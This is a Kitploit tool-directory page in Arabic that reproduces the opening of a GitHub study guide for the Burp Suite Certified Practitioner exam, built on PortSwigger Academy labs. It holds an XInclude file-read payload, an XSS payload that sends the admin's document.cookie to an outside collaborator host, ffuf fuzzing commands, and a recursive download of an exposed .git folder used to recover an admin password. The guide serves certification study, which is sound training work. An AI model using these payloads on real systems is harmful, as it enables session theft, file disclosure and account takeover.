Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Burp-Suite-Certified-Practitioner-Exam-Study — ملاحظات دراسية عملية وأدلة تطبيقية لمختبرات PortSwigger Academy، تغطي ثغرات الويب والحمولات والتعداد واستراتيجيات امتحان BSCP. | Kitploit
أدوات/GitHubGitHub/botesjuan/burp-suite-certified-practitioner-exam-study
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراقالتعلم والتعليمموارد منسقةتطوير الحمولاتمسارات ودورات التعلم
مختبرات وتدريب عملي
الأفضل في مسارات ودورات التعلم #9
GitHubbotesjuan/burp-suite-certified-practitioner-exam-study

Burp-Suite-Certified-Practitioner-Exam-Study

ملاحظات دراسية عملية وأدلة تطبيقية لمختبرات PortSwigger Academy، تغطي ثغرات الويب والحمولات والتعداد واستراتيجيات امتحان BSCP.

عرض المستودع
1.5k385172منذ شهر واحدتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

دراسة امتحان Burp Suite Certified Practitioner

هذه ملاحظاتي الدراسية مع أكثر من 110 مختبراً من مختبرات PortSwigger Academy. استخدمت هذه المختبرات لاجتياز امتحان Burp Suite Certified Practitioner لعام 2023. مؤهلي BSCP.
لمزيد من المعلومات، تفضل بزيارة PortSwigger Academy للحصول على أحدث المواد التعليمية.


المسح - التعداد
المسح الموجّه
مسح الكيانات غير القياسية

توطيد القدم - المرحلة 1
اكتشاف المحتوى
DOM-XSS
XSS - البرمجة النصية عبر المواقع
تسميم ذاكرة التخزين المؤقت للويب
ترويسات المضيف
تهريب طلبات HTTP
القوة الغاشمة
المصادقة

تصعيد الامتيازات - المرحلة 2
CSRF - الاستيلاء على الحساب
إعادة تعيين كلمة المرور
SQLi - حقن SQL
JWT - رموز JSON Web
تلوث النموذج الأولي
اختبار API
التحكم في الوصول
نقاط نهاية GraphQL API
CORS - مشاركة الموارد عبر الأصول

استخراج البيانات - المرحلة 3
XXE - كيانات وحقن XML
SSRF - تزوير الطلبات من جانب الخادم
SSTI - حقن القوالب من جانب الخادم
SSPP - تلوث النموذج الأولي من جانب الخادم
LFI - اجتياز مسار الملف
رفع الملفات
إلغاء التسلسل
حقن أوامر نظام التشغيل

الملحق
سكربتات Python
Payloads
قوائم الكلمات
المسح الموجّه للهدف
المنهجية
محتوى تدريبي إضافي

نصائحي في Burp

أنصح بإجراء أكبر عدد ممكن من تحدي المختبر الغامض لاختبار مهاراتك وتقليل الوقت الذي تستغرقه في تحديد الثغرات، قبل التقدم للامتحان.
كما وجدت أن نصيحة PortSwigger هذه حول إعادة اجتياز امتحانك مفيدة جداً.
شاهد CryptoCat - مراجعة Burp Suite Certified Professional (BSCP) + نصائح وحيل للحصول على نظرة جديدة لامتحان BSCP في 2024.




Buy Me A Coffee

شكراً لدعمكم بفنجان قهوة، \o/

شهادتي في Burp Suite Certified Practitioner.


المسح

يبدأ تعداد تطبيقات الويب بمسح أولي وموجّه في المهام المقيّدة بالوقت.

المسح الموجّه
مسح الكيانات غير القياسية

المسح الموجّه

نظراً لضيق الوقت في المهام أو الامتحان، امسح نقاط الإدخال المحددة لطلبات معينة.

scan-defined-insertion-points

رصد الماسح ثغرة حقن XML في معامل storeId، وأدى ذلك إلى قراءة ملف Carlos السري.```xml <xi:include parse="text" href="file:///home/carlos/secret"/>

>طلب XInclude خارج النطاق، نحتاج إلى DTD مستضاف لقراءة الملف المحلي.```xml
<hqt xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://OASTIFY.COM/foo"/></hqt>

مختبر PortSwigger: اكتشاف الثغرات بسرعة من خلال الفحص المستهدف

فحص هياكل البيانات غير القياسية

فحص هياكل البيانات غير القياسية باستخدام ميزة Burp لفحص نقطة الإدخال المحددة لنص محدد في الاستجابة أو الطلبات.

scan-selected-insertion-point

حدد الثغرة الأمنية من خلال نتائج ماسح Burp.
في هذه الحالة، باستخدام XSS المحدد، قم بسرقة ملفات تعريف الارتباط الخاصة بالمستخدم المسؤول من خلال صياغة الحمولة في نقطة الإدخال المحددة.``` '"><svg/onload=fetch(//OASTIFY.COM/${encodeURIComponent(document.cookie)})>:CURRENT-USER-LOGIN-COOKIE-2ND-PART

>قم بترميز الأحرف المفتاحية بصيغة URL.  

![admin-cookie-stealer](https://assets.kitploit.com/production/public/readmes/51008/64ba64b0fa7e1681859eb5d76a88f94fb91a78655f1ce768ff8e1b50f3cf57c1/990ac058ff6a9727193848c821acf60a43011fa7ba8dfd967ab6b3dd7f2e0bcb-display-v1.webp)  

>استخدم كوكي مستخدم المسؤول للوصول إلى لوحة الإدارة عن طريق استبداله في جلسة المتصفح الحالية.  

[مختبر PortSwigger: فحص هياكل البيانات غير القياسية](https://portswigger.net/web-security/essential-skills/using-burp-scanner-during-manual-testing/lab-scanning-non-standard-data-structures)  
    
-----

# موطئ قدم  
  
# اكتشاف المحتوى  

>يبدأ تعداد الهدف باختبار Fuzzing لأدلة وملفات الويب. يمكنك إما استخدام أدوات Burp engagement أو خيار اكتشاف المحتوى للعثور على المسارات والملفات المخفية، أو استخدام `FFUF` لتعداد أدلة وملفات الويب. كما أن الاطلاع على `robots.txt` أو `sitemap.xml` قد يكشف عن محتوى.```bash
wget https://raw.githubusercontent.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/main/wordlists/burp-labs-wordlist.txt

ffuf -c -w ./burp-labs-wordlist.txt -u https://TARGET.web-security-academy.net/FUZZ

أداة مشاركة Burp، اكتشاف المحتوى باستخدام قائمة الكلمات المجمّعة الخاصة بي burp-labs-wordlist كقائمة ملفات مخصصة.

content-discovery.png

افحص فروع مستودع git في النسخة المحلية المُنزّلة، باستخدام أداة git-cola. ثم اختر التراجع عن آخر التزام واستخرج كلمة مرور المسؤول من نافذة الفروقات.``` wget -r https://TARGET.web-security-academy.net/.git/

git-cola --repo 0ad900ad039b4591c0a4f91b00a600e7.web-security-academy.net/

![git-cola](https://assets.kitploit.com/production/public/readmes/51008/14079c28e5cbbdff33e677924bd48ab71e6afd5a28c04080d37705e6612df983/cfd1fad85dc91fe0115a20bcfbc1a45eabd76e74a1d5d2ccf74dea9d85d85f47-display-v1.webp)  

[مختبر PortSwigger: الإفصاح عن المعلومات في سجل التحكم بالإصدارات](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-version-control-history)
تنزيل الأداة